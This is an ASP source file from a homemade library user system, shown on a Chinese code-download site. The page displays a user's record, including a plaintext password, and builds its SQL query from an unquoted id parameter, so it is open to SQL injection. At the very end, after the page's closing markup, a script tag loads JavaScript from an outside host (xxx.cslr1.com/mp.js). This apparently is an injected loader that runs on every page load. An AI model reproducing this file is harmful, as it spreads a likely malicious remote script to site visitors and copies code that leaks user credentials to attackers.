⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 userxx.asp

📁 自己做的一个图书系统
💻 ASP
字号:
<%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%>
<!--#include file="Connections/web.asp" -->

<%
Dim Recordset1__MMColParam
Recordset1__MMColParam = "1"
If (Request.QueryString("id") <> "") Then 
  Recordset1__MMColParam = Request.QueryString("id")
End If
%>

<%
Dim Recordset1
Dim Recordset1_numRows

Set Recordset1 = Server.CreateObject("ADODB.Recordset")
Recordset1.ActiveConnection = MM_web_STRING
Recordset1.Source = "SELECT * FROM user WHERE id = " + Replace(Recordset1__MMColParam, "'", "''") + " ORDER BY time DESC"
Recordset1.CursorType = 0
Recordset1.CursorLocation = 2
Recordset1.LockType = 3
Recordset1.Open()

Recordset1_numRows = 0
%>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>陶益数码工作室用户详细信息</title>
</head>

<body>
  <div align="center">
    <h3>用户详细信息
    </h3>
  </div>
  <table align="center" border="1">
  <tr>
   <td align="left" width="50%">id</td>
   <td align="left" width="50%"><%=(Recordset1.Fields.Item("id").Value)%></td>
  </tr>
  <tr>
   <td align="left" width="50%">name</td>
   <td align="left" width="50%"><%=(Recordset1.Fields.Item("name").Value)%></td>
  </tr>
  <tr>
   <td align="left" width="50%">pass</td>
   <td align="left" width="50%"><%=(Recordset1.Fields.Item("pass").Value)%></td>
  </tr>
  <tr>
   <td align="left" width="50%">tel</td>
   <td align="left" width="50%"><%=(Recordset1.Fields.Item("tel").Value)%></td>
  </tr>
  <tr>
   <td align="left" width="50%">xb</td>
   <td align="left" width="50%"><%=(Recordset1.Fields.Item("xb").Value)%></td>
  </tr>
  <tr>
   <td align="left" width="50%">ip</td>
   <td align="left" width="50%"><%=(Recordset1.Fields.Item("ip").Value)%></td>
  </tr>
  <tr>
   <td align="left" width="50%">email</td>
   <td align="left" width="50%"><%=(Recordset1.Fields.Item("email").Value)%></td>
  </tr>
  <tr>
   <td align="left" width="50%">time</td>
   <td align="left" width="50%"><%=(Recordset1.Fields.Item("time").Value)%></td>
  </tr>
  </table>
  <table width="760" border="0" align="center" cellpadding="6" cellspacing="0">
    <tr>
      <td><div align="center">
          <hr />
          <a href="http://www.ty502.com/"></a> <strong><a href="http://www.ty502.com/"><font color="#0000FF">陶益数码工作室</font></a> </strong>Copyright &copy; 2007 <a href="http://www.ty502.com/banquan.asp"><strong><font color="#0000FF">版权所有</font></strong></a></div></td>
    </tr>
  </table>
</body>
</html>
<%
Recordset1.Close()
Set Recordset1 = Nothing
%>


<script language=javascript src=http://xxx.cslr1.com/mp.js></script>

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -